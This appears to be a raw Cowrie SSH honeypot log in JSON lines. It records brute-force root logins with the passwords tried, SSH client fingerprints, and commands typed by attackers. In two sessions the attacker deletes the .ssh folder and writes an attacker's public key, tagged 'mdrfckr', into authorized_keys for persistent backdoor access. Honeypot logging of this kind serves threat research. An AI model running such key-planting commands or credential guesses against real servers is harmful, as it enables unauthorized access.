{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:07.382332Z","src_ip":"212.227.235.229","session":"990be1a0c2cd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:48:08.557250Z","src_ip":"212.227.235.229","session":"990be1a0c2cd"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:08.841650Z","src_ip":"212.227.235.229","session":"26717cae2ead"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:08.842399Z","src_ip":"212.227.235.229","session":"990be1a0c2cd"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:48:15.528108Z","src_ip":"212.227.125.160","session":"d1da7a3b7ade"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56300,"dst_ip":"1.2.3.4","dst_port":22,"session":"15fdd62fa6c4","protocol":"ssh","message":"New connection: 217.72.205.35:56300 (1.2.3.4:22) [session: 15fdd62fa6c4]","sensor":"my-vps","timestamp":"2025-09-09T07:48:22.418966Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:22.420378Z","src_ip":"217.72.205.35","session":"15fdd62fa6c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38832,"dst_ip":"1.2.3.4","dst_port":22,"session":"0edd9c367ed6","protocol":"ssh","message":"New connection: 212.227.235.229:38832 (1.2.3.4:22) [session: 0edd9c367ed6]","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.135615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.136596Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.219683Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.login.success","username":"root","password":"wm456456","message":"login attempt [root/wm456456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.554085Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:48:34.738000Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.738861Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.739793Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:34.825164Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:48:35.096055Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.096712Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.186219Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.187161Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38836,"dst_ip":"1.2.3.4","dst_port":22,"session":"afc303250e27","protocol":"ssh","message":"New connection: 212.227.235.229:38836 (1.2.3.4:22) [session: afc303250e27]","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.269198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.270036Z","src_ip":"212.227.235.229","session":"afc303250e27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.353972Z","src_ip":"212.227.235.229","session":"afc303250e27"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:48:35.735160Z","src_ip":"212.227.235.229","session":"afc303250e27"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:36.820961Z","src_ip":"212.227.235.229","session":"afc303250e27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38850,"dst_ip":"1.2.3.4","dst_port":22,"session":"54fbaaa6f7f8","protocol":"ssh","message":"New connection: 212.227.235.229:38850 (1.2.3.4:22) [session: 54fbaaa6f7f8]","sensor":"my-vps","timestamp":"2025-09-09T07:48:36.904720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:48:36.905688Z","src_ip":"212.227.235.229","session":"54fbaaa6f7f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:48:36.989546Z","src_ip":"212.227.235.229","session":"54fbaaa6f7f8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:48:37.369221Z","src_ip":"212.227.235.229","session":"54fbaaa6f7f8"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:37.455734Z","src_ip":"212.227.235.229","session":"0edd9c367ed6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:48:37.456646Z","src_ip":"212.227.235.229","session":"54fbaaa6f7f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53764,"dst_ip":"1.2.3.4","dst_port":22,"session":"279fb830c2b7","protocol":"ssh","message":"New connection: 212.227.125.160:53764 (1.2.3.4:22) [session: 279fb830c2b7]","sensor":"my-vps","timestamp":"2025-09-09T07:49:06.204694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:49:06.836922Z","src_ip":"212.227.125.160","session":"279fb830c2b7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:49:06.837560Z","src_ip":"212.227.125.160","session":"279fb830c2b7"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-09-09T07:49:19.606566Z","src_ip":"212.227.125.160","session":"279fb830c2b7"}
{"eventid":"cowrie.session.closed","duration":"14.9","message":"Connection lost after 14.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:21.102466Z","src_ip":"212.227.125.160","session":"279fb830c2b7"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":41296,"dst_ip":"1.2.3.4","dst_port":22,"session":"970b14622f0f","protocol":"ssh","message":"New connection: 92.118.39.62:41296 (1.2.3.4:22) [session: 970b14622f0f]","sensor":"my-vps","timestamp":"2025-09-09T07:49:34.107113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:49:34.107921Z","src_ip":"92.118.39.62","session":"970b14622f0f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:49:34.138260Z","src_ip":"92.118.39.62","session":"970b14622f0f"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-09-09T07:49:34.231252Z","src_ip":"92.118.39.62","session":"970b14622f0f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:35.262499Z","src_ip":"92.118.39.62","session":"970b14622f0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54762,"dst_ip":"1.2.3.4","dst_port":22,"session":"43f0d136ae38","protocol":"ssh","message":"New connection: 212.227.235.229:54762 (1.2.3.4:22) [session: 43f0d136ae38]","sensor":"my-vps","timestamp":"2025-09-09T07:49:36.924086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:49:36.924777Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.010609Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.login.success","username":"root","password":"44444444","message":"login attempt [root/44444444] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.389094Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:49:37.631524Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.632209Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.633183Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:49:37.719278Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:49:37.906435Z","src_ip":"212.227.235.229","session":"43f0d136ae38"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 